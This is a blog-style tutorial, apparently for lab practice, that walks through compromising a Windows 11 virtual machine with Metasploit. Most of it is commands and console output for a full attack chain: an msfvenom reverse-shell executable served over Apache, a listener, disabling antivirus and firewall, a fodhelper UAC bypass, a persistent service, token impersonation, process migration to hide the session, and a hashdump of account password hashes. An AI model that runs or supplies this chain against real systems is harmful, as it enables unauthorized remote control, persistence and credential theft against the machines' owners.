Ciphers Security

System Hacking using Metasploit

metasploit

Hello everyone, in this article we see how we can get remote access to someone’s system by sending them a payload and when they click on that payload we will get the reverse connection by using Metasploit with the victim’s system.

This article is only for educational purposes, if you perform these steps on someone’s system for hacking it will be considered a legal crime which can result in legal action. use all the processes in your VM systems.

Prerequisites for this module:-

  1. Virtualization Application VMware or VirtualBox
  2. Attacking machines such as Kali Linux or Parrot OS
  3. Victim machines such as Windows 11

the process we will follow for hacking the system using Metasploit

  1. Generate payload
  2. Send payload to the victim in a local network
  3. Metasploit multi-handler module for reverse connection
  4. Escalating Privileges
  5. Creating Persistence connection
  6. using hashdump for grabbing admin password hash

Firstly, we need to generate the payload by msfvenom

msfvenom for generating the payload

here I am using msfvenom to generate the payload at my convenience, if you want to use another payload generator it will be fine, we just need a malicious payload that can send a reverse TCP connection from the victim’s system.

The command for generating the payload using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.2.2 -f exe -o payload.exe

┌─[✗]─[root@parrot]─[/home/parrotsec/Documents]
└──╼ msfvenom -p windows/meterpreter/reverse_tcp lhost=10.0.2.2 -f exe -o payload.exe
      [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
      [-] No arch selected, selecting arch: x86 from the payload
      No encoder specified, outputting raw payload
      Payload size: 354 bytes
      Final size of exe file: 73802 bytes
      Saved as: payload.exe

here we are using a payload name windows/meterpreter/reverse_tcp

  1. [-p] payload name that you are going to use
  2. [lhost=x.x.x.x] the local host IP where you want to receive the connection request
  3. [-f] payload format as per your need
  4. [-o] name and place where you want to save the payload

Now we have generated a payload in [.exe] format, which is Windows executable format. and after that, we need to send that payload to the victim system, which is our own Windows 11 VM machine.

For sending the payload over the local network we will use the apache2 server utility which is the default present in every Linux operating system.

so first we need to check whether the server is running or not and if not running we will start it by giving commands

systemctl status apache2

if your server is in the disabled stage, then use this command to start it

systemctl start apache2

Now, your apache2 server will start running on your local network. To check it, you can type in of local IP address in the browser, and you will see the Apache server landing page

apache1 web server

we need to move our payload to a web server directory, which is at /var/www/html. for this, our command will be like

mv [filename/directoryname] [path/where/to/move]

┌─[parrotsec@parrot]─[~/Documents]
└──╼ $sudo mv payload.exe /var/www/html/

┌─[parrotsec@parrot]─[~/Documents]
└──╼ $ls /var/www/html/
index.html  index.nginx-debian.html  payload.exe 

after this, we can download our payload from the web server in the local network, by giving the IP address followed by the file name we want to access.

Send payload to the victim in a local network

for executing the payload in the victim system, we need to do some checks like

  1. turnoff antivirus
  2. turn off firewall
  3. turn off real-time protection

Now open the web browser in the victim system, and give your web server IP address followed by the file name. For me, it is payload.exe and my IP is 10.0.2.2.

downloading payload

  1. enter the 10.0.2.2/payload.exe in the browser
  2. right-click on the file, then choose Keep file > show more > keep anyway
payload

our payload is downloaded over the victim’s system now for further steps, go back to the attacking machine.

Metasploit multi-handler module for reverse connection

In this step, we will set up a handler for accepting the reverse TCP connection from our payload. here we are using a module of the Metasploit framework.

first, run the Metasploit by msfconsole

msfconsole

after executing the framework now we will load the module

[msf](Jobs:0 Agents:0) >> use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> 

after this we will see the required options and set their value accordingly

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set lhost 10.0.2.2
lhost => 10.0.2.2
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(multi/handler) >> 

all the values are configured, we need to run the exploit by giving the run command

[msf](Jobs:0 Agents:1) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 10.0.2.2:4444 

your exploit will start listening on local IP and port you specified.

after this, you need to run the payload in the victim’s system just double-click on the EXE file, and you’ll get the reverse connection in the Metasploit shell.

payload.exe

sometimes you will not get the connection because your payload outgoing connection will be blocked by the Windows firewall, To get rid of this open Windows threat management search for the recently blocked threats, and then allow them to execute on the system.

windows threat management

after clicking on, Allow on device, you will get the reverse connection in the shell

[msf](Jobs:0 Agents:1) exploit(multi/handler) >> run

[*] Started reverse TCP handler on 10.0.2.2:4444 
[*] Sending stage (175686 bytes) to 10.0.2.3
[*] Meterpreter session 2 opened (10.0.2.2:4444 -> 10.0.2.3:50651) at 2023-12-11 17:57:16 +0530

(Meterpreter 2)(C:\Users\User\Downloads) >

the connection is established and sessions are created inside the shell. now use the help command to get the list of commands you can execute toward the victim system.

now use {getprivs} command to get the list of privileges you have

(Meterpreter 3)(C:\Users\User\Downloads) > getprivs

Enabled Process Privileges
==========================

Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

these privileges are too less to execute any high-level command, so we need to escalate our privilege to the admin level for more control over the victim system.

Escalating Privileges in metasploitc

  1. first, execute the bg command to go to the background from the session
  2. for escalating privileges, we need to use an exploit that is already present in the tool itself.
  3. as of now, you can try any exploit that will work for you
  4. I am going to use the bypassuac_fodhelper exploit to escalate my privileges.
  5. To use this exploit we need to load it, so use the command [use (exploit number)] {use 11}
  6. now we need to see the options we need to set to run this exploit
  7. we need to set our session number in this exploit
  8. first, check your session numbers
  9. then type command [set session 1]
  10. then run the exploit
(Meterpreter 1)(C:\Users\User\Downloads) > bg
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:2) exploit(multi/handler) >> search bypassuac

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
   1   exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
   2   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   3   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   4   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   5   exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   6   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   7   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   8   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
   9   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
   10  exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
   11  exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   12  exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)


Interact with a module by name or index. For example info 12, use 12 or use exploit/windows/local/bypassuac_sluihijack

[msf](Jobs:0 Agents:2) exploit(multi/handler) >> use 11
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:2) exploit(windows/local/bypassuac_fodhelper) >> options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.2         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x86



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:2) exploit(windows/local/bypassuac_fodhelper) >> sessions

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  1         meterpreter x86/windows  WINDEV2309EVAL\User @ WINDEV2309EVAL  10.0.2.2:4444 -> 10.0.2.3:50774 (10.0.2.3)
  2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV2309EVAL  10.0.2.2:4444 -> 10.0.2.3:50775 (10.0.2.3)

[msf](Jobs:0 Agents:2) exploit(windows/local/bypassuac_fodhelper) >> set session 1
session => 1
[msf](Jobs:0 Agents:2) exploit(windows/local/bypassuac_fodhelper) >> run

[*] Started reverse TCP handler on 10.0.2.2:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Cleaining up registry keys ...
[*] Exploit completed, session 2 was created.
[msf](Jobs:0 Agents:2) exploit(windows/local/bypassuac_fodhelper) >> 

Now after the exploit is executed successfully, check your privileges that are increased. now you have more privileges than earlier.

(Meterpreter 4)(C:\Windows\system32) > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeTimeZonePrivilege
SeUndockPrivilege

(Meterpreter 4)(C:\Windows\system32) > 

We got admin privileges from the victim system now we need to make our connection persistent, which means we didn’t get disconnected from the victim’s system in any circumstances.

now we will learn how to make our connection persistence

Creating Persistence connection in Metasploit

Persistence refers to getting connected to the victim’s PC every time without running the payload individually every time. It will make the payload run in the background of the victim’s PC.

  1. first, execute the bg command to go to the background from the session
  2. for making our connection persistence we need to use the persistence exploit available in the Metasploit tool
  3. use command search to find the list of the persistence exploits [ search persistence ]
  4. here I will use the persistence_service exploit you can use anyone.
  5. use 11
  6. for running this exploit we need to set some options in it, so use the command [ options ]
  7. only session options need to be updated over here, so first see our session number by command [ sessions ]
  8. my session number is 6 so the command will be [ set session 6 ]
  9. now run the exploit by command [ run ]
bg
[*] Backgrounding session 5...
[msf](Jobs:0 Agents:2) exploit(multi/handler) >> search persistence

Matching Modules
================

   #   Name                                                  Disclosure Date  Rank       Check  Description
   -   ----                                                  ---------------  ----       -----  -----------
   0   exploit/linux/local/apt_package_manager_persistence   1999-03-09       excellent  No     APT Package Manager Persistence
   1   exploit/windows/local/ps_wmi_exec                     2012-08-19       excellent  No     Authenticated WMI Exec via Powershell
   2   exploit/linux/local/autostart_persistence             2006-02-13       excellent  No     Autostart Desktop Item Persistence
   3   exploit/linux/local/bash_profile_persistence          1989-06-08       normal     No     Bash Profile Persistence
   4   exploit/linux/local/cron_persistence                  1979-07-01       excellent  No     Cron Persistence
   5   exploit/osx/local/persistence                         2012-04-01       excellent  No     Mac OS X Persistent Payload Installer
   6   exploit/osx/local/sudo_password_bypass                2013-02-28       normal     Yes    Mac OS X Sudo Password Bypass
   7   exploit/windows/local/vss_persistence                 2011-10-21       excellent  No     Persistent Payload in Windows Volume Shadow Copy
   8   auxiliary/server/regsvr32_command_delivery_server                      normal     No     Regsvr32.exe (.sct) Command Delivery Server
   9   post/linux/manage/sshkey_persistence                                   excellent  No     SSH Key Persistence
   10  post/windows/manage/sshkey_persistence                                 good       No     SSH Key Persistence
   11  exploit/linux/local/service_persistence               1983-01-01       excellent  No     Service Persistence
   12  exploit/windows/local/wmi_persistence                 2017-06-06       normal     No     WMI Event Subscription Persistence
   13  post/windows/gather/enum_ad_managedby_groups                           normal     No     Windows Gather Active Directory Managed Groups
   14  post/windows/manage/persistence_exe                                    normal     No     Windows Manage Persistent EXE Payload Installer
   15  exploit/windows/local/s4u_persistence                 2013-01-02       excellent  No     Windows Manage User Level Persistent Payload Installer
   16  exploit/windows/local/persistence                     2011-10-19       excellent  No     Windows Persistent Registry Startup Payload Installer
   17  exploit/windows/local/persistence_service             2018-10-20       excellent  No     Windows Persistent Service Installer
   18  exploit/windows/local/registry_persistence            2015-07-01       excellent  Yes    Windows Registry Only Persistence
   19  exploit/windows/local/persistence_image_exec_options  2008-06-28       excellent  No     Windows Silent Process Exit Persistence
   20  exploit/linux/local/yum_package_manager_persistence   2003-12-17       excellent  No     Yum Package Manager Persistence
   21  exploit/unix/local/at_persistence                     1997-01-01       excellent  Yes    at(1) Persistence
   22  exploit/linux/local/rc_local_persistence              1980-10-01       excellent  No     rc.local Persistence


Interact with a module by name or index. For example info 22, use 22 or use exploit/linux/local/rc_local_persistence

[msf](Jobs:0 Agents:2) exploit(multi/handler) >> use 17
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:2) exploit(windows/local/persistence_service) >> options

Module options (exploit/windows/local/persistence_service):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   REMOTE_EXE_NAME                       no        The remote victim name. Random string as default.
   REMOTE_EXE_PATH                       no        The remote victim exe path to run. Use temp directory as default.
   RETRY_TIME           5                no        The retry time that shell connect failed. 5 seconds as default.
   SERVICE_DESCRIPTION                   no        The description of service. Random string as default.
   SERVICE_NAME                          no        The name of service. Random string as default.
   SESSION                               yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.2.2         yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:2) exploit(windows/local/persistence_service) >> sessions

Active sessions
===============

  Id  Name  Type                     Information                           Connection
  --  ----  ----                     -----------                           ----------
  5         meterpreter x86/windows  WINDEV2309EVAL\User @ WINDEV2309EVAL  10.0.2.2:4444 -> 10.0.2.3:50831 (10.0.2.3)
  6         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ WINDEV2309EVAL  10.0.2.2:4444 -> 10.0.2.3:50830 (10.0.2.3)

[msf](Jobs:0 Agents:2) exploit(windows/local/persistence_service) >> set session 6
session => 6
[msf](Jobs:0 Agents:2) exploit(windows/local/persistence_service) >> 
[msf](Jobs:0 Agents:2) exploit(windows/local/persistence_service) >> run

[*] Started reverse TCP handler on 10.0.2.2:4444 
[*] Running module against WINDEV2309EVAL
[+] Meterpreter service exe written to C:\Windows\TEMP\iZjp.exe
[*] Creating service zqhWwO
[*] Cleanup Meterpreter RC File: /home/parrotsec/.msf4/logs/persistence/WINDEV2309EVAL_20231212.3730/WINDEV2309EVAL_20231212.3730.rc
[*] Sending stage (175686 bytes) to 10.0.2.3
[*] Meterpreter session 7 opened (10.0.2.2:4444 -> 10.0.2.3:50911) at 2023-12-12 09:37:32 +0530

(Meterpreter 7)(C:\Windows\system32) > 

this is our persistent connection with the victim machine.

Note:- if your sessions are dying for unknown reasons, then check the Windows Defender recent blocked threats, you can check it by [Windows Defender> protection history > (match the time of the blocked threat with your system time) > allow the threat inside the defender]

using hashdump for grabbing admin password hash in Metasploit

In this phase, we will impersonate ourselves in the victim’s system to make ourselves a legitimate user and process inside the system.

To execute these things we will follow some steps writing down:-

  1. now use the incognito module by using the command [ load incognito ]
    • The “load incognito” command in Metasploit allows the attacker to impersonate or steal these tokens, effectively assuming the identity and privileges of another user.
  2. now use the command [ list_tokens -u ]
    • list_tokens: This is the main command for listing information about process tokens.
    • -u: This option specifies that the command should display information only for the specified user.
  3. then copy the NT AUTHORITY\SYSTEM, because we to impersonate on this
  4. use command [ impersonate_token "NT AUTHORITY\SYSTEM" ]
  5. now we need to migrate our process to any other system process to hide it from user vision
  6. first, we will list all the running processes inside the system by [ ps ] command
  7. now choose any system authority process to migrate it with our process
  8. here I chose process number 10916 for migration so our command will be like this [ migrate 10916 ]
  9. now use the command [ hashdump ] For getting hash dumps for every user inside the machine, you will get the hashdump of the user’s
(Meterpreter 9)(C:\Windows\system32) > load incognito 
Loading extension incognito...Success.
(Meterpreter 9)(C:\Windows\system32) > list_tokens -u

Delegation Tokens Available
========================================
Font Driver Host\UMFD-0
Font Driver Host\UMFD-1
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WINDEV2309EVAL\User
Window Manager\DWM-1

Impersonation Tokens Available
========================================
No tokens available

(Meterpreter 9)(C:\Windows\system32) > impersonate_token "NT AUTHORITY\SYSTEM"
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
(Meterpreter 9)(C:\Windows\system32) > 
(Meterpreter 9)(C:\Windows\system32) > ps

Process List
============

 PID    PPID   Name                         Arch  Session  User                          Path
 ---    ----   ----                         ----  -------  ----                          ----

 12904  1344   GoogleCrashHandler64.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler64.exe
 13204  836    svchost.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 13260  836    svchost.exe                  x64   0
 13280  976    XboxPcAppFT.exe              x64   1        WINDEV2309EVAL\User           C:\Program Files\WindowsApps\Microsoft.GamingApp_2311.1001.7.0_x64__8wekyb3d8bbwe\XboxPcAppFT.exe
 13556  8188   msedgewebview2.exe           x64   1        WINDEV2309EVAL\User           C:\Program Files (x86)\Microsoft\EdgeWebView\Application\120.0.2210.61\msedgewebview2.exe
 13900  8188   msedgewebview2.exe           x64   1        WINDEV2309EVAL\User           C:\Program Files (x86)\Microsoft\EdgeWebView\Application\120.0.2210.61\msedgewebview2.exe

(Meterpreter 9)(C:\Windows\system32) > migrate 13204
[*] Migrating from 11624 to 13204...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into non existent process
(Meterpreter 9)(C:\Windows\system32) > migrate 10916
[*] Migrating from 11624 to 10916...
[*] Migration completed successfully.
(Meterpreter 9)(C:\Windows\system32) > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
User:1000:aad3b435b51404eeaad3b435b51404ee:3a1d4019e4c6156ee822e51f96be0cdd:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:1f4f885ebd3f1aadba90e7fbef295d37:::
(Meterpreter 9)(C:\Windows\system32) > 

If you have any queries regarding the above content, or you want to update anything in the content, then contact us with your queries. You can directly post your question in the group.

Connect with us on these platforms